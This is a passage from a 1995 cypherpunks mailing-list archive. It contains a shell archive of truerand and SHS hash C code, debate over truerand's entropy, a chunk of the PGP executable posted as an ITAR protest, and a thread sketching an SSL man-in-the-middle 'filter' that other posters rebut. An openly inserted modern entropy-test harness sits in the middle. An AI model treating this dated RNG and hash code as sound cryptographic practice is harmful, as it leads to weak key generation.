X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
/*
X * WARNING: depending on the particular platform, truerand() output may
X * be biased or correlated.  In general, you can expect about 16 bits of
X * "pseudo-entropy" out of each 32 bit word returned by truerand(),
X * but it may not be uniformly diffused.  You should therefore run
X * the output through some post-whitening function (like MD5 or DES or
X * whatever) before using it to generate key material.  (RSAREF's
X * random package does this for you when you feed truerand() bits to the
X * seed input function.)
X *
X * Test these assumptions on your own platform before fielding a system
X * based on this software or these techniques.
X *
X * This software seems to work well (at 16 bits per truerand() call) on
X * a Sun Sparc-20 under SunOS 4.1.3 and on a P100 under BSDI 2.0.  You're
X * on your own elsewhere.
X */
X
#include <signal.h>
#include <setjmp.h>
#include <sys/time.h>
#include <math.h>
#include <stdio.h>
X
static jmp_buf env;
static unsigned count;
static unsigned ocount;
static unsigned buffer;
X
static int
tick()
{
X	struct itimerval it, oit;
X
X	timerclear(&it.it_interval);
X	it.it_value.tv_sec = 0;
X	it.it_value.tv_usec = 16665;
X	if (setitimer(ITIMER_REAL, &it, &oit) < 0)
X		perror("tick");
}
X
static void
interrupt()
{
X	if (count)
X		longjmp(env, 1);
X	(void) signal(SIGALRM, interrupt);
X	tick();
}
X
static unsigned long
roulette()
{
X
X	if (setjmp(env)) {
X		count ^= (count>>3) ^ (count>>6) ^ ocount;
X		count &= 0x7;
X		ocount=count;
X		buffer = (buffer<<3) ^ count;
X		return buffer;
X	}
X	(void) signal(SIGALRM, interrupt);
X	count = 0;
X	tick();
X	for (;;)
X		count++;	/* about 1 MHz on VAX 11/780 */
}
X
unsigned long
truerand()
{
X
X	count=0;
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	return roulette();
}
X
int
n_truerand(n)
int n;
{
X	int slop, v;
X
X	slop = 0x7FFFFFFF % n;
X	do {
X		v = truerand() >> 1;
X	} while (v <= slop);
X	return v % n;
}
X
X
X
SHAR_EOF
  $shar_touch -am 0930143395 'truerand.c' &&
  chmod 0644 'truerand.c' ||
  echo 'restore of truerand.c failed'
  shar_count="`wc -c < 'truerand.c'`"
  test 2886 -eq "$shar_count" ||
    echo "truerand.c: original size 2886, current size $shar_count"
fi
# ============= shs.c ==============
if test -f 'shs.c' && test X"$1" != X"-c"; then
  echo 'x - skipping shs.c (file already exists)'
else
  echo 'x - extracting shs.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'shs.c' &&
/*
X * The authors of this software are Jim Reeds and Jack Lacy
X *              Copyright (c) 1992, 1994 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
/*
X * Secure Hash Standard
X * proposed NIST SHS
X * coded for byte strings: number of bits is a multiple of 8
X *
X * Copyright (c) 1992, 1994 AT&T Bell Laboratories
X * Coded by Jim Reeds 5 Feb 1992
X * Enhanced by Jack Lacy 1993, 1994
X */
X
/*
X * unsigned char * shs(char *s, int n);
X *
X * input:  
X *                s character array to be hashed
X *                n length of s in BYTES
X * output:
X *                return value: address of 5 unsigned longs holding hash
X *
X * machine dependencies:
X *                assumes a char is 8 bits
X */
X
/*
X * passes test on:
X *                gauss (vax)
X *                3k (cray)
X *                slepian (MIPS)
X *                bird (sparcstation II)
X */
X
#include <sys/types.h>
#include <stdio.h>
X
typedef struct {
X    long totalLength;
X    unsigned long h[5];
X    unsigned long w[80];
} SHS_CTX;
X
unsigned char *shs();
#ifdef SOLARIS2X
#define bzero(b, l)             memset(b, 0, l)
#define bcopy(s, d, l)          memcpy(d, s, l)
#define bcmp(s, d, l)           (memcmp(s, d, l)? 1 : 0)
#endif
X
static long nbits;
static unsigned long *h;
static unsigned long *w;
static void shs1();
/*
static void packl (unsigned long);
static void pack (unsigned char, unsigned char, unsigned char, unsigned char);
static void shs1(void);
static void opack(unsigned char);
*/
X
#define MASK        (unsigned long)0xffffffffL        /* in case more than 32 bits per long */
X
/*
X * stick one byte into the current block; process the block when full
X */
static void opack(c)
X  unsigned char c;
{
X	int n32, nd32, shiftbits;
X	register unsigned long x, mask, y;
X	
X	nd32 = (int)(nbits >> 5);  /* nbits/32 */
X	n32 = (int)(nbits & 0x1f); /* nbits%32 */
X	shiftbits = 24-n32;
X	
X	x = (unsigned long)(c<<shiftbits);
X	mask = (unsigned long)(0xff << shiftbits);
X	mask = ~mask;
X	
X	y = w[nd32];
X	y = (y & mask) + x;
X	w[nd32] = y;
X	
X	nbits += 8;
X	if(nbits==512){
X		nbits = 0;
X		shs1();
X	}
}
X
static void pack(c0, c1, c2, c3)
X  unsigned char c0, c1, c2, c3;
{
X	int nd32;
X	
X	nd32 = (int)(nbits >> 5);
X	w[nd32] = (u_long)(((u_long)c0<<24) | ((u_long)c1<<16) | ((u_long)c2<<8) | (u_long)c3);
X	
X	nbits += 32;
X	if(nbits==512){
X		nbits = 0;
X		shs1();
X	}
}
X
/*
X * stick a 4 byte number into the current block
X */
static void
packl(x)
X  unsigned long x;
{
X	pack((unsigned char)(x>>24), (unsigned char)(x>>16),
X	     (unsigned char)(x>>8), (unsigned char)(x>>0));
}
X
/*
X * process one block
X */
static void
shs1()
{
X	unsigned long *wp;
X	unsigned long temp;
X	unsigned long A, B, C, D, E;
X	int t;
X	
#define S(n,x) (u_long)(((x)<<(n))|((MASK&(x))>>(32-(n))))
X	
X	wp = w;
X	t = 8;
X	do {
X		wp[16] = S(1, (u_long)(wp[13]^wp[8]^wp[2]^wp[0]));
X		wp[17] = S(1, (u_long)(wp[14]^wp[9]^wp[3]^wp[1]));
X		wp[18] = S(1, (u_long)(wp[15]^wp[10]^wp[4]^wp[2]));
X		wp[19] = S(1, (u_long)(wp[16]^wp[11]^wp[5]^wp[3]));
X		wp[20] = S(1, (u_long)(wp[17]^wp[12]^wp[6]^wp[4]));
X		wp[21] = S(1, (u_long)(wp[18]^wp[13]^wp[7]^wp[5]));
X		wp[22] = S(1, (u_long)(wp[19]^wp[14]^wp[8]^wp[6]));
X		wp[23] = S(1, (u_long)(wp[20]^wp[15]^wp[9]^wp[7]));
X		wp += 8;
X		t--;
X	} while (t > 0);
X	
X	A = h[0];
X	B = h[1];
X	C = h[2];
X	D = h[3];
X	E = h[4];
X	
X	t = 0;
X	while (t<20) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x5a827999L + ((B&C)|(D&~B));
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<40) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x6ed9eba1L + (B^C^D);
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<60) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x8f1bbcdcL + ((B&C)|(B&D)|(C&D));
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<80) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0xca62c1d6L + (B^C^D);
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	h[0] = MASK&(h[0] + A);
X	h[1] = MASK&(h[1] + B);
X	h[2] = MASK&(h[2] + C);
X	h[3] = MASK&(h[3] + D);
X	h[4] = MASK&(h[4] + E);
}
X
#define CHARSTOLONG(wp,s,i) {*wp++ = (u_long)((((u_long)(s[i])&0xff)<<24)|(((u_long)(s[i+1])&0xff)<<16)|(((u_long)(s[i+2])&0xff)<<8)|(u_long)(s[i+3]&0xff));}
X
X
void
shsInit(mdContext)
X  SHS_CTX *mdContext;
{
X	nbits = 0;
X	mdContext->h[0] = (unsigned long)0x67452301L;
X	mdContext->h[1] = (unsigned long)0xefcdab89L;
X	mdContext->h[2] = (unsigned long)0x98badcfeL;
X	mdContext->h[3] = (unsigned long)0x10325476L;
X	mdContext->h[4] = (unsigned long)0xc3d2e1f0L;
X	mdContext->totalLength = 0;
}
X
X
void
shsUpdate(mdContext, s, n)
X  SHS_CTX *mdContext;
X  unsigned char *s;
X  unsigned int n;
{
X	register unsigned long *wp;
X	long nn = n;
X	long i;
X	
X	w = mdContext->w;
X	h = mdContext->h;
X	mdContext->totalLength += n;
X	
X	nbits = 0;
X	n = n/(u_long)64;
X	wp = w;
X	
X	while(n>0){
X		CHARSTOLONG(wp,s,0);
X		CHARSTOLONG(wp,s,4);
X		CHARSTOLONG(wp,s,8);
X		CHARSTOLONG(wp,s,12);
X		CHARSTOLONG(wp,s,16);
X		CHARSTOLONG(wp,s,20);
X		CHARSTOLONG(wp,s,24);
X		CHARSTOLONG(wp,s,28);
X		CHARSTOLONG(wp,s,32);
X		CHARSTOLONG(wp,s,36);
X		CHARSTOLONG(wp,s,40);
X		CHARSTOLONG(wp,s,44);
X		CHARSTOLONG(wp,s,48);
X		CHARSTOLONG(wp,s,52);
X		CHARSTOLONG(wp,s,56);
X		CHARSTOLONG(wp,s,60);
X		n--;
X		wp = w;
X		s = (s + 64);
X		shs1();
X	}
X	i=nn%64;
X	while(i>3) {
X		CHARSTOLONG(wp,s,0);
X		s = (s + 4);
X		nbits += (u_long)32;
X		i -= 4;
X	}
X	while (i) {
X		opack((unsigned char)*s++);
X		i--;
X	}
}
X
void
shsFinal(mdContext)
X  SHS_CTX *mdContext;
{
X	long nn = mdContext->totalLength;
X	w = mdContext->w;
X	h = mdContext->h;
X	
X	opack(128);
X	while(nbits != 448)opack(0);
X	packl((unsigned long)(nn>>29));
X	packl((unsigned long)(nn<<3));
X	
X	/* if(nbits != 0)
X	   handle_exception(CRITICAL,"shsFinal(): nbits != 0\n");*/
}
X
unsigned char *
shs(s, n)
X  unsigned char *s;
X  long n;
{
X        SHS_CTX *mdContext;
X	static SHS_CTX mdC;
X	static unsigned char ret[20];
X	int i;
X	
X	mdContext = &mdC;
X
X	shsInit(mdContext);
X	shsUpdate(mdContext, s, n);
X	shsFinal(mdContext);
X	for (i=0; i<5; i++) {
X		ret[i*4] = (mdContext->h[i]>>24)&0xff;
X		ret[i*4+1] = (mdContext->h[i]>>16)&0xff;
X		ret[i*4+2] = (mdContext->h[i]>>8)&0xff;
X		ret[i*4+3] = (mdContext->h[i])&0xff;
X	}
X        
X	return ret;
}
X
/*int fread(char *, int, int, FILE *);*/
X
unsigned long *
fShsDigest(in)
X  FILE *in;
{
X	SHS_CTX *mdContext;
X	SHS_CTX mdC;
X	unsigned char buffer[1024];
X	long length, total;
X
X	mdContext = &mdC;
X	
X	bzero(buffer, 1024);
X
X	total = 0;
X	shsInit(mdContext);
X	while ((length = fread(buffer, 1, 1024, in)) != 0) {
X		total += length;
X		shsUpdate(mdContext, buffer, length);
X	}
X	shsFinal(mdContext);
X
X	return mdContext->h;
}
X
X
X
SHAR_EOF
  $shar_touch -am 0930142495 'shs.c' &&
  chmod 0644 'shs.c' ||
  echo 'restore of shs.c failed'
  shar_count="`wc -c < 'shs.c'`"
  test 7142 -eq "$shar_count" ||
    echo "shs.c: original size 7142, current size $shar_count"
fi
# ============= randtest.c ==============
if test -f 'randtest.c' && test X"$1" != X"-c"; then
  echo 'x - skipping randtest.c (file already exists)'
else
  echo 'x - extracting randtest.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'randtest.c' &&
main(argc,argv)
int argc; char **argv;
{
X	int count;
X
X	if (argc==1)
X		count = 0;
X	else
X		count = atoi(argv[1]) + 1;
X	while (--count)
X		randbyte();
}
SHAR_EOF
  $shar_touch -am 0930150095 'randtest.c' &&
  chmod 0644 'randtest.c' ||
  echo 'restore of randtest.c failed'
  shar_count="`wc -c < 'randtest.c'`"
  test 149 -eq "$shar_count" ||
    echo "randtest.c: original size 149, current size $shar_count"
fi
exit 0






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 30 Sep 95 14:02:23 PDT
To: Matt Blaze <mab@crypto.com>
Subject: Re: my favorite random-numbers-in-software package (unix)
Message-ID: <199509302103.QAA26651@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:46 PM 9/30/95 -0400, you wrote:

... <deletia> ...

>The basic idea is that you exploit randomness in the drift between
>the processor clock and the rate at which interval timer interrupts
>occur.  Such drift occurs even on idle processors.  randbyte() assumes
>that there's at least about .4 bits of "entropy" per interrupt, which is 
>(probably) a safe assumption on modern processors.  Randomness introduced
>by the OS (scheduler, etc.) can add to the overall entropy, but shouldn't
>be relied upon by itself.
>
>An advantage to this approach (using clock skew) is that the randomness
>doesn't depend on external events like user input, network traffic or
>processor load.  That makes it especially attractive for generating keys
>on unattended servers, e.g., for generating Diffie-Hellman exponents.
>Note, however, that very (very) slow and heavily-loaded processors may
>not provide enough cycles to the truerand process between interrupts for
>these assumptions to hold.  Also, all bets are off on processors that use
>a single clock source for both interval timing and CPU clocking.

Even with the exclusion of processors using single-source clocking for
interval and CPU timing, this would *seem* to be somewhat hazardous. Any two
clocking mechanisms that are 'mixed' are going to result in a number of
harmonics, or beat frequencies. While your system - at any given instant -
is quite likely to have a decent amount of randomness in it, I'd hazard a
guess that repetitive use would result in a discernible pattern. Even
something as 'coarse' as an interrupt timer has a finite range that it can
(must) operate in. Even if the CPU oscillator is based on a ceramic
resonator (nowhere near as stable/accurate as a crystal), the clock on it is
going to stay within +/-1% (worst case, for a *really* cheap oscillator) of
frequency, and drift not more than some number of Parts Per Million per
Period. Mixing the innate (relative) accuracy of two oscillators, and the
necessarily limited amount of drift that they're capable of, would seem to
result in an unacceptably low-yield source of 'real' randomness.

Of course, I'm kind of math-impaired when it comes to crypto, so my 20+
years of electronics (hardware) experience may not apply in this case :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148
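
Blaze's source comments ask readers to test the entropy assumptions on their own platform, and Merriman's reply worries about repeating beat patterns between the two clocks. The check below is an added example, not part of librand or of either post: it assumes the raw 3-bit value from each roulette() tick has been logged to an array, and the function names, the 6-sigma threshold and the constructed sample data are all assumptions. It tests both the per-tick entropy budget (randbyte() consumes 22 ticks for 8 output bits) and correlation at lags 1 to 32.

```c
/* Added example. All sample data is constructed; nothing was measured on hardware. */
#include <stdint.h>
#include <stdio.h>

#define TICKS_PER_BYTE 22  /* randbyte(): 2 truerand() calls x 11 roulette() ticks */
#define NSAMP 4096
#define MAX_LAG 32
enum { UNIFORM, PERIODIC, BIASED };

/* -log2(p) for 0 < p <= 1, built bit by bit so no libm is required. */
static double neg_log2(double p)
{
    double x = 1.0 / p, result = 0.0, bit = 0.5;
    while (x >= 2.0) { x /= 2.0; result += 1.0; }      /* integer part */
    for (int i = 0; i < 30; i++, bit /= 2.0) {         /* fractional bits */
        x *= x;
        if (x >= 2.0) { x /= 2.0; result += bit; }
    }
    return result;
}

static void histogram(const unsigned char *s, size_t n, size_t hist[8])
{
    for (size_t i = 0; i < 8; i++) hist[i] = 0;
    for (size_t i = 0; i < n; i++) hist[s[i] & 7]++;
}

/* Min-entropy per tick, -log2(max_count / n); ignores ordering, so an upper bound. */
double min_entropy_bits(const unsigned char *s, size_t n)
{
    size_t hist[8], max = 0;
    if (n == 0) return 0.0;
    histogram(s, n, hist);
    for (size_t i = 0; i < 8; i++) if (hist[i] > max) max = hist[i];
    return neg_log2((double)max / (double)n);
}

/* Fraction of positions i where s[i] == s[i + lag]. */
double match_rate(const unsigned char *s, size_t n, size_t lag)
{
    size_t hits = 0, m = n - lag;
    for (size_t i = 0; i < m; i++) hits += (s[i] == s[i + lag]);
    return (double)hits / (double)m;
}

/* First lag in 1..MAX_LAG whose match rate exceeds, by more than 6 standard
 * deviations, the rate p expected from independent samples with the same
 * histogram (sigma^2 = p(1-p)/m; compared squared to avoid sqrt()). 0 if none. */
int periodic_lag(const unsigned char *s, size_t n)
{
    size_t hist[8];
    double p = 0.0;
    if (n <= MAX_LAG) return 0;
    histogram(s, n, hist);
    for (size_t i = 0; i < 8; i++) p += ((double)hist[i] / n) * ((double)hist[i] / n);
    for (size_t lag = 1; lag <= MAX_LAG; lag++) {
        double m = (double)(n - lag);
        double d = match_rate(s, n, lag) - p;
        if (d > 0.0 && d * d * m > 36.0 * p * (1.0 - p)) return (int)lag;
    }
    return 0;
}

/* Accept only if no repeating pattern is seen AND 22 ticks cover 8 output bits. */
int source_ok(const unsigned char *s, size_t n)
{
    if (periodic_lag(s, n) != 0) return 0;
    return TICKS_PER_BYTE * min_entropy_bits(s, n) >= 8.0;
}

static uint32_t mix32(uint32_t h)   /* integer mixer, used only to build test data */
{
    h ^= h >> 16; h *= 0x85ebca6bu; h ^= h >> 13; h *= 0xc2b2ae35u; h ^= h >> 16;
    return h;
}

/* Constructed stand-ins for logged samples: well mixed, 7-tick beat, mostly 0. */
void fill_constructed(unsigned char *s, size_t n, int kind)
{
    static const unsigned char beat[7] = {0, 3, 5, 1, 6, 2, 7};
    for (size_t i = 0; i < n; i++) {
        uint32_t r = mix32((uint32_t)i + 0x9e3779b9u);
        if (kind == PERIODIC)    s[i] = beat[i % 7];
        else if (kind == BIASED) s[i] = (r & 31) ? 0 : (unsigned char)(r >> 29);
        else                     s[i] = (unsigned char)(r >> 29);
    }
}

int main(void)
{
    static unsigned char s[NSAMP];
    for (int k = UNIFORM; k <= BIASED; k++) {
        fill_constructed(s, NSAMP, k);
        printf("kind=%d min-entropy/tick=%.3f periodic_lag=%d ok=%d\n", k,
               min_entropy_bits(s, NSAMP), periodic_lag(s, NSAMP), source_ok(s, NSAMP));
    }
    return 0;
}
```

The periodic sample has a near-flat histogram, so the frequency count alone rates it at about 2.8 bits per tick; only the lag test exposes the 7-tick repeat.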






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 15:14:10 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9509302213.AA11359@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok, several people have asked:

> Please explain to me how you can break SSL using the above method. I
> don't follow your line of thought. How could my fake www server
> intercept and redirect packets to netscape.com short of hacking a DNS
> server?

client ->       filter                          Client sends packet with K(c)
                filter ->       Server          filter forwards packet with K(f)
                filter       <- Server          Server sends encrypts with K(f)
client       <- filter                          filter re-encrypts with K(c)

As the protocol progresses the filter also uses the master key,
and follows the renegotiation as the master key expires.


The existence of a working filter is enough to invalidate the security in
NetScape's claims.


Hacking a DNS server is one way, spoofing a DNS reply to named is easier,
simply packaging the filter into a router/bridge close to the server
is more effective ... even if hacking the incoming phoneline/T1 line
to the server and inserting a very transparent bridge AKA a phone tap.

There is enough dollars to make the risks ... :)

John

BTW ... how do I join these two lists? Where are they archived to
catch up with past traffic?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 30 Sep 95 16:22:50 PDT
To: jbass@dmsd.com (John L. Bass)
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9509302239.AA11407@dmsd.com>
Message-ID: <199509302336.QAA23456@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
> >   jbass@dmsd.com writes:
> >    > client ->       filter                          Client sends packet with K(c)
> >    >                 filter ->       Server          filter forwards packet with K(f)
> >    >                 filter       <- Server          Server sends encrypts with K(f)
> >    > client       <- filter                          filter re-encrypts with K(c)
> >    >
> >    > As the protocol progresses the filter also uses the master key,
> >    > and follows the renegotiation as the master key expires.
> > 
> > Yeah, but in order for this to work, the fake server needs to know
> > netscape.com's private (secret) key, no?
> > 
> > -jon
> 
> No ... the public part of any server private key is held by the filter
> and not returned to the client. The client only encrypts with public
> keys provided by the filter. The Server only encrypts with public keys
> provided by the filter. The filter has cleartext of the entire session.

What you have described is the classic 'man in the middle' attack.
Netscape claims that SSL V.3 is immune to the MITM attack in
appendix D.4 of the SSL V.3 spec. 

You will need to get the 'filter' (MITM) key signed by Verisign.
Or hack Verisign's server-key-signing key.


BTW your 'offer' is silly- this is not a trivial amount of work, and you
would not deserve any credit for coming up with so ordinary an
attack.  Write the code yourself, or pay the market rate for it.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 15:40:11 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9509302239.AA11407@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain


>   jbass@dmsd.com writes:
>    > client ->       filter                          Client sends packet with K(c)
>    >                 filter ->       Server          filter forwards packet with K(f)
>    >                 filter       <- Server          Server sends encrypts with K(f)
>    > client       <- filter                          filter re-encrypts with K(c)
>    >
>    > As the protocol progresses the filter also uses the master key,
>    > and follows the renegotiation as the master key expires.
> 
> Yeah, but in order for this to work, the fake server needs to know
> netscape.com's private (secret) key, no?
> 
> -jon

No ... the public part of any server private key is held by the filter
and not returned to the client. The client only encrypts with public
keys provided by the filter. The Server only encrypts with public keys
provided by the filter. The filter has cleartext of the entire session.

John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Fri, 29 Sep 95 23:44:19 PDT
To: yusuf921@uidaho.edu (Syed Yusuf)
Subject: Re: Electronic junk mail
In-Reply-To: <Pine.HPP.3.91.950929164534.29284A-100000@harrier.csrv.uidaho.edu>
Message-ID: <199509300642.QAA28042@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Syed Yusuf <yusuf921@uidaho.edu>
  and cypherpunks@toad.com

S.Y. wrote:
> I just recieved an electronic junkmail! 
...
> <root@goshawk.cserv.uidaho.edu>:
...
> > there is _nothing_ you can do to keep unwanted mail out of your mailbox,
>           ^^^^^^^^^!!!!
> Nothing? NOTHING??????
...

You could only accept signed e-mail. From a suitably defined set of
signators, of course.

If you write a script to do that for you, it would be useful to
others as well: parents could set it up for their innocent children
to guard them against all them bad guys on the net of which there
are exactly 98.3527% (no, that's not from [Rimm 95], I made it up).

The other thing would be that you would thereby force all your
correspondents to use PGP, which can't be such a bad thing, can it.


Yes, no, maybe?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGzmoSxV6mvvBgf5AQFRXQQAzP2Zv6reuIVyq9TdofXq5wJCz5aLdXou
yexGtkXSo8HKcHEmtF1DpcTZuzNs0zuXD92G3VAI+nCncAzfKKsLziSZ5hd93Dnm
huTC+wLm6XrnrjwS56h8F843bBE2jrEL1rnBN9UhEUD9VOyA1ncj7rb8Nap9Z0/V
885XUrREQTM=
=pOSV
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbass@dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 15:50:19 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9509302250.AA11430@dmsd.com>
MIME-Version: 1.0
Content-Type: text/plain



Ok ... one more time ... the filter has to replace the client/server
keys in the packet stream with its own ...

John





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don.Stephenson@Eng.Sun.COM (Don Stephenson)
Date: Sat, 30 Sep 95 17:15:57 PDT
To: jbass@dmsd.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010003.AA08494@icenine.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



I haven't read the SSL spec for a while but my understanding was that 
the server passed its public key to the client via a certificate 
signed by a mutually trusted certificate authority (i.e., Verisign).

How would the filter be able to forge such a certificate?

- Don



> From jbass@dmsd.com Sat Sep 30 16:47:11 1995
> Date: Sat, 30 Sep 95 16:39:57 -0600
> From: jbass@dmsd.com (John L. Bass)
> To: www-security@ns2.rutgers.edu, cypherpunks@toad.com
> Subject: Re: NetScape's dependence upon RSA down for the count!
> 
> >   jbass@dmsd.com writes:
> >    > client ->       filter                          Client sends packet with K(c)
> >    >                 filter ->       Server          filter forwards packet with K(f)
> >    >                 filter       <- Server          Server sends encrypts with K(f)
> >    > client       <- filter                          filter re-encrypts with K(c)
> >    >
> >    > As the protocol progresses the filter also uses the master key,
> >    > and follows the renegotiation as the master key expires.
> > 
> > Yeah, but in order for this to work, the fake server needs to know
> > netscape.com's private (secret) key, no?
> > 
> > -jon
> 
> No ... the public part of any server private key is held by the filter
> and not returned to the client. The client only encrypts with public
> keys provided by the filter. The Server only encrypts with public keys
> provided by the filter. The filter has cleartext of the entire session.
> 
> John
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don.Stephenson@Eng.Sun.COM (Don Stephenson)
Date: Sat, 30 Sep 95 17:33:59 PDT
To: jbass@dmsd.com
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510010024.AA08498@icenine.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



Yes, but the certificate that contains the public key of the server 
is digitally signed by the certificate authority (CA).

To create such a certificate requires the secret key of the CA.

The public key of the CA is contained in the client software, which 
uses it to verify the validity of the server certificate.

- Don 


> From jbass@dmsd.com Sat Sep 30 17:15:36 1995
> Date: Sat, 30 Sep 95 16:50:05 -0600
> From: jbass@dmsd.com (John L. Bass)
> To: www-security@ns2.rutgers.edu, cypherpunks@toad.com
> Subject: Re: NetScape's dependence upon RSA down for the count!
> 
> 
> Ok ... one more time ... the filter has to replace the client/server
> keys in the packet stream with its own ...
> 
> John
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 30 Sep 95 17:11:58 PDT
To: jbass@dmsd.com (John L. Bass)
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9509302250.AA11430@dmsd.com>
Message-ID: <199510010025.RAA23630@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Ok ... one more time ... the filter has to replace the client/server
> keys in the packet stream with its own ...


Where in SSL are these 'client/server keys' being sent?
A pointer to the page of the V3 spec where these keys are 
described will do.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sat, 30 Sep 95 00:27:15 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cypherpunks Press release
In-Reply-To: <ac8d6cee030210045390@[205.199.118.202]>
Message-ID: <199509300726.RAA28172@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and tcmay@got.net (Timothy C. May)

tcmay@got.net (Timothy C. May) wrote:

> I guess you all know how much I hate this "who will be our spokesman?"
...

It seems to me that there are two viewpoints, 
  * a spokesman would be useful, and
  * a spokesman cannot be appointed due to lack of org

Which both seem to be true to me (they are *not* contradictory, only
the consequences are).


How about this idea: I remember once seeing some piece on some TV
personality (sorry, don't remember who, long time ago) who was
interviewed by fax. The jounalist sent questions to him, and some
time later received answers.

All that is needed then is someone with a fax machine to volunteer
to receive the fax, type it in and summarise the response afterwards
(noting points on which there was disagreement, and who disagreed
in what way).

...
> I've turned down several recent chances for interviews, for these reasons:
> 
> 1. I feel the people doing the work should be interviewed, not just someone
> who has some visibility (whatever mine might be). If PGP is the issue, then
...

Except PGP skill doesn't equal PR skill, not to mention that there
might be a geographical, time-zone or language barrier.

Sometimes having a separate PR person is useful, even if it does
tend to lead to the moronic statements salesdroids are infamous for.
With care, this problem can be minimized.

...
> 2. Location, location, location! The media foci are Washington, New York,
> and San Francisco, at least for our area of interest. Occasional forays
> into Austin, Miami, L.A., etc. This is where the taped interviews are done.
...

Not all PGP is done in those areas. You might want to have a SpokesPunk
near a focus to avoid having to get the people who actually do the work
to one of the abovementioned foci.

...
